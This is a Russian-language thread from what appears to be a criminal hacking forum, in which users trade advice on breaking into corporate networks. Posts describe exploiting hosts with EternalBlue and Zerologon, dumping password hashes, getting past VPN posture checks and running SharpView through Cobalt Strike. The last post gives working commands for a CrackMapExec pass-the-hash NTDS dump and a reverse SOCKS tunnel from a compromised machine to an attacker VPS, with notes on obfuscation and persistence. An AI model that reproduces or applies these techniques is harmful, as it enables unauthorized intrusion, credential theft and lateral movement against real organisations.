• XSS.stack #1 – первый литературный журнал от юзеров форума

[net-hacking] Вопросы по сетям

Перейти к новому Отслеживать
utpxgrbdvn сказал(а):
тренируюсь на маленькой сетке (20 компов), т.к. мало опыта. Доступ через впн. Один комп пробил етерналом, получил метерпретер, сдампил хэши и пароли. Сделал своего локал админа
Когда через шелл попробовал чекнуть "net group "domain admins" /domain" выдало ошибку - типа комп не в домене (просто WORKGROUP).
Скрипты импакет (getADUsers, getNPUsers и тп) не заработали, я так понимаю, из-за того что комп пробитый не в домене

Все машины с 3389 пробовал blackkeep'ом - не пробились. Пробовал везде лезть через рдп по кредам с пробитой тачки - не пускает.
Один хост, подозреваю, DC - попробовал его zerologon - эксплойт задумался мин на 5 и ничего не выдал

Вопрос: что можно еще попробовать сделать в этой сетке? что я мог упустить из внимания?
Сначала посмотри есть ли у тебя доменные креды или процессы запущенные от доменных юзеров .Ищи креды или процессы у которых владелец domain\user а не протсо user
 
DrSleep сказал(а):
Ставь атеру, там есть аналоги анидеск,сам анидеск и тд.Теоритически(я так пока не делал) можно закинуть vnc ,запустить, порт внц прокинуть Ngrok и коннектиться.Все софты белые.Тот же realvnc.Запуск psexec/Ps-Remouting/Wmiexec/WinRM/SMBexec да дофига чего, тести, пробуй.
Короче все перерыл, внц запускается конект идет на ЛОГОН экран, но не дает управлять ПК, хотя все настройки, ни мышь ни ктрл+альт+дел не дают залогинется. Анидеск накатил, но но не дает запуститься с пароля, все равно требует принять с компа. Через ДК разрешил все удаленные конекты, и отключил фаервол - ноль... Руками через ЦМД и повершел от Админа тоже самое, причем настройки меняются, но результата не дает
 
NOP сказал(а):
Запускаешь и используешь, не благодари
Уточняй что тебе надо от него и чего ты не нашел в ридми
чесно говоря вообще нет понимания как его юзать. SharpView с гит хаба на кали скачал. Теперь хочу через кобу закинуть его на целевую тачку и запустить, по типу:
execute-assembly C:\windows\SharpView.exe Find-DomainUserLocation -UserIdentity Administrator
чтобы найти админа.
если команда верная, то при запуске ехе SharpView коба высирает красную ошибку
 
Как подключиться к впн глобал протект из линукса?Пытался через опенконнект ,но там какая-то проблема с хипом,которую не удалось решить.Проверка хип вообще байпасится?На основе каких параметров обычно разрешается доступ?
 
Последнее редактирование:
CCod сказал(а):
Как подключиться к впн глобал протект из линукса?Пытался через опенконнект ,но там какая-то проблема с хипом,которую не удалось решить.Проверка хип вообще байпасится?На основе каких параметров обычно разрешается доступ?
Попробуй взять виндовый впс, подключиться, поднять на нем прокси с аутентификацией(тот же chisel, как быстрый и простой вариант), и дальше ходить со своей линукс тачки с этой проксей по сети.
 
seidziwhitehat сказал(а):
Попробуй взять виндовый впс, подключиться, поднять на нем прокси с аутентификацией(тот же chisel, как быстрый и простой вариант), и дальше ходить со своей линукс тачки с этой проксей по сети.
Я попробовал на виндовой виртуалке и такая же проблема.Видимо хип чекает не только ос.Может такое быть что ему виртуалка не нравится?Или мб создать на машине юзера с кредами от впн?
 
могу посмотреть ваши фортики когда вырубаеться через секунду, или когда нет routes, когда весь трафик перенаправлен на 0.0.0.0 0.0.0.0 to ppp0
все кроме стандартных портов, не 443, не 10443
 
кто может помочь, база veeam на 2003 сервере. как на 2003 сдампить ее содержимое? ее экспортнули в файл, но там просит пассфразу что б просмотреть, которой нету. как на 2003 блин вкрывать ? помогите софтом или советом
 
ExitQ сказал(а):
Нуждаюсь в бинарнике CrackMapExec, чтоб была возможность запуска именно exe файла от 7 винды, до 10.
Обычно мне приходилось на таргет ставить питон и уже через него устанавливать cme, но в этот раз установка любых файлов запрещена админом, а просканировать сетку нужно.
Я думаю exe многих тут выручит.

e site posmotre, tam mnogo novogo v documentacie
 
h8ta сказал(а):
могу посмотреть ваши фортики когда вырубаеться через секунду, или когда нет routes, когда весь трафик перенаправлен на 0.0.0.0 0.0.0.0 to ppp0
все кроме стандартных портов, не 443, не 10443
В чем проблема расконнекта фортика, интервалы 5-15мин
 
ExitQ сказал(а):
Нуждаюсь в бинарнике CrackMapExec, чтоб была возможность запуска именно exe файла от 7 винды, до 10.
Обычно мне приходилось на таргет ставить питон и уже через него устанавливать cme, но в этот раз установка любых файлов запрещена админом, а просканировать сетку нужно.
Я думаю exe многих тут выручит.
https://github.com/maaaaz/CrackMapExecWin 7 летней давности, на вин сервер 2016 воркает норм.
 
ExitQ сказал(а):
Нуждаюсь в бинарнике CrackMapExec, чтоб была возможность запуска именно exe файла от 7 винды, до 10.
Обычно мне приходилось на таргет ставить питон и уже через него устанавливать cme, но в этот раз установка любых файлов запрещена админом, а просканировать сетку нужно.
Я думаю exe многих тут выручит.
Это некрасивая работа.
На уязвимой машине подними как для примера(их довольно много)
github.com

GitHub - kost/revsocks: Reverse SOCKS5 implementation in Go

Reverse SOCKS5 implementation in Go . Contribute to kost/revsocks development by creating an account on GitHub.
github.com
Далее через прокси можно запускать crackmap.Можно на винде через проксифаер, но мне больше нравится на лине через proxychain.
Код: 
proxychains crackmapexec smb 192.168.88.1 -u Administrator -H 0d4d031521212121b596a65f033 --ntds drsuapi

Так же можно сканить сетку через прокси, юзать RDP и тд.А поднять VPN то можно и по шарам ходить.И на ломаный хост не тащить кучу совсем ненужного софта.
 
ExitQ сказал(а):
будет ли в таком случае авторизация с хоста№1, где развернули эту проксю - считаться в остальной сетке?
Авторизация по какому протоколу?
Crackmap smb точно работает
RDP точно работает
PS-Remote точно работает с введением кред от домена
Если нужно по шарам пошариться тут либо VPN поднимай и хоть через родной explorer шарься.Либо по RDP по кредам домена через прокси на любой хост можно зайти и юзать все что нужно.
Браузер кстати тоже норм через прокси- vcenter,nas и тд все работает.
Для поднятия прокси нужен VPS на Linux(я юзаю ubuntu/debian) качаешь туда
Код: 
wget https://github.com/kost/revsocks/releases/download/v1.1.1/revsocks_linux_amd64
chmod +x revsocks_linux_amd64
./revsocks_linux_amd64 -listen VPS_IP:8089 -socks VPS_IP:1080 -pass superpassss
Качаешь клиент на винду(обфусцируется норм)
Код: 
https://github.com/kost/revsocks/releases/download/v1.1.1/revsocks_windows_amd64.exe
Далее
Код: 
revsocks.exe -connect VPS_IP:1080 -pass superpassss -recn 0 -rect 300
если в кобе
shell revsocks.exe -connect VPS_IP:1080 -pass superpassss -recn 0 -rect 300
Прокси поднимется на VPS_IP:1080 его в проксичейн или проксифаер как сокс5
Можно прописать как сервис чтоб держался понадежней через https://github.com/winsw/winsw
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх